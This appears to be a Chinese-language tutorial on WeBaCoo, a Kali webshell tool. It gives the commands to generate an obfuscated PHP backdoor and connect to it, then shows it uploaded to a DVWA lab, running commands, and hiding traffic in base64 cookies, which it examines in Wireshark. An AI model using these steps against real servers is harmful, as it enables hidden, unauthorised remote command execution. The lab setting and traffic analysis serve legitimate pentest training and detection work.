kali中的webshell工具--webacoo

webacoo

---

webshell其实就是放置在服务器上的一段代码

kali中生成webshell的工具

WeBaCoo（Web Backdoor Cookie）

特点及使用方法

• 类终端的shell
• 编码通信内容通过cookie头传输，隐蔽性强
• cookie中传递数据使用的参数：
  • cm：base64编码的命令
  • cn：服务器用于返回数据的cookie头的名
  • cp：返回信息定界符
• 生成服务端
  • Webacoo -g -o a.php
• 客户端连接
  • Webacoo -t -u http://x.x.x.x/a.php

生成一个webshell测试：

查看文件内容可以看到是被base64加密的

在DVWA靶机环境中上传该文件

然后使用webacoo连接服务器

成功连接：

可以直接执行系统命令：

webacoo的隐蔽性高之一是因为他采用的是cookie传参，且为base64加密

接着使用wireshark抓包查看其cookie参数：

这里cm选项中的字符串经过解码后就是我们传入的命令ls

服务器端返回的setcookie中的M-cookie字段就是命令返回的结果，cp变量值为QXg@和M-cookie中的开头对应，为界定符。

这里的M-cookie可以在连接webshell时通过-c参数自定义：

除此外，webacoo还可以在连接时使用-p选项，通过代理服务器连接目标服务器

更多参数可以通过webacoo -h查看帮助手册

 root@bogon:~# webacoo -h

     WeBaCoo 0.2. - Web Backdoor Cookie Script-Kit
     Copyright (C) - Anestis Bechtsoudis
     { @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }

 Usage: webacoo [options]

 Options:
   -g        Generate backdoor code (-o is required)

   -f FUNCTION    PHP System function to use
     FUNCTION
         : system     (default)
         : shell_exec
         : exec
         : passthru
         : popen

   -o OUTPUT    Generated backdoor output filename

   -r         Return un-obfuscated backdoor code

   -t        Establish remote "terminal" connection (-u is required)

   -u URL    Backdoor URL

   -e CMD    Single command execution mode (-t and -u are required)

   -m METHOD    HTTP method to be used (default is GET)

   -c C_NAME    Cookie name (default: "M-cookie")

   -d DELIM    Delimiter (default: New random for each request)

   -a AGENT    HTTP header user-agent (default exist)

   -p PROXY    Use proxy (tor, ip:port or user:pass:ip:port)

   -v LEVEL    Verbose level
     LEVEL
         : no additional info (default)
         : print HTTP headers
         : print HTTP headers + data

   -l LOG    Log activity to file

   -h        Display help and exit

   update    Check for updates and apply if any